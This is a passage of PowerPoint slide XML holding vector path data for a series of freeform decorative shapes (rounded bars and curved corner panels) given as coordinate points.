                  <a:pt x="810086" y="18034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125"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90" name="Freeform 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10758488" y="4309998"/>
            <a:ext cx="1433830" cy="2548255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1433829" h="2548254">
                <a:moveTo>
                  <a:pt x="0" y="2548000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4553" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10089" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17750" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27485" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39243" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52972" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68621" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86139" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105474" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126574" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149389" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173868" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199958" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227608" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256767" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287384" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319408" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352786" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387468" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423403" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460538" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498823" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538206" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578636" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620061" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662430" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705692" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749796" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="794690" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840322" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886642" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933598" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="981138" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1028551" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075508" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1121829" y="10029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1167464" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1212360" y="27430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256467" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299732" y="52923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342106" y="68576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1383535" y="86098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1423969" y="105437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1433512" y="110550"/>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91" name="Freeform 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982351" y="5419725"/>
            <a:ext cx="419100" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="47625">
                <a:moveTo>
                  <a:pt x="395325" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23850" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14547" y="1873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6959" y="6984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1847" y="14573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1847" y="33051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6982" y="40655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14557" y="45753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23850" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395325" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404557" y="45751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412116" y="40640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417203" y="33105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419074" y="23875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417203" y="14573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412105" y="6984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404554" y="1873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39532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92" name="Freeform 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="5581650"/>
            <a:ext cx="419100" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="47625">
                <a:moveTo>
                  <a:pt x="395350" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23875" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23875" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395350" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39535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93" name="Freeform 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="5753100"/>
            <a:ext cx="419100" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="47625">
                <a:moveTo>
                  <a:pt x="395350" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23875" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23875" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395350" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39535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94" name="Freeform 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="5915025"/>
            <a:ext cx="419100" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="47625">
                <a:moveTo>
                  <a:pt x="395350" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23875" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23875" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395350" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39535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95" name="Freeform 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="6086475"/>
            <a:ext cx="419100" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="47625">
                <a:moveTo>
                  <a:pt x="395350" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23875" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23875" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395350" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39535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96" name="Freeform 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="6248400"/>
            <a:ext cx="419100" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="419100" h="47625">
                <a:moveTo>
                  <a:pt x="395350" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23875" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6985" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14573" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23875" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395350" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417228" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412130" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404580" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39535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97" name="Freeform 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5143500"/>
            <a:ext cx="2133600" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2133600" h="1333500">
                <a:moveTo>
                  <a:pt x="1466850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1466850" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1331825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="1326878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="1318771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="1307617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="1293528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="1276617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="1256998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="1234782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="1210083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="1183014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="1153688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="1122217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="1088713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="1053291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="1016063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="977141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="936638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="894668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="851343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="806776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="761079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="714366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="666750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="619140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="572434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="526742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="482179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="438856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="396888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="356386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="317465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="280236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="244812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="211307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="179834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="150505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="123433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="98732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="76514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="56892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="39978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="25887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="14731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="6622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1466850"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98" name="Freeform 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6262682"/>
            <a:ext cx="1633855" cy="595630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1633855" h="595629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1033462" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1080357" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126266" y="7137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1171055" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214591" y="27823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256741" y="42915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297370" y="60995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1336345" y="81930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373533" y="105587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408801" y="131832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442014" y="160531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473040" y="191551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1501744" y="224760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1527994" y="260023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551655" y="297207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572595" y="336178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1590679" y="376804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605775" y="418951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617748" y="462485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1626466" y="507274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631795" y="553183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1633417" y="595316"/>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99" name="Freeform 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6072187"/>
            <a:ext cx="1891030" cy="786130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1891030" h="786129">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1100137" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1148304" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195707" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242264" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287891" y="22423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332508" y="34691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1376029" y="49460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1418374" y="66645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459459" y="86164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499202" y="107936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1537519" y="131876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1574329" y="157902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1609548" y="185932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643095" y="215883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1674886" y="247672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704838" y="281216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1732869" y="316433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1758896" y="353241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782837" y="391556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1804609" y="431295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824129" y="472376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841315" y="514717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856083" y="558235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868352" y="602846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1878038" y="648469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885059" y="695020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1889333" y="742417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1890633" y="78581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00" name="Freeform 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5881687"/>
            <a:ext cx="2138680" cy="976630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2138680" h="976629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1157287" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1204822" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1251774" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1298090" y="10027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343720" y="17690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1388612" y="27426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432715" y="39186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1475977" y="52917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518347" y="68568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559773" y="86087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600204" y="105424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1639590" y="126527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677877" y="149344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715015" y="173825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1750953" y="199917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1785638" y="227569"/>
                </a:lnTo>
                <a:lnTo>
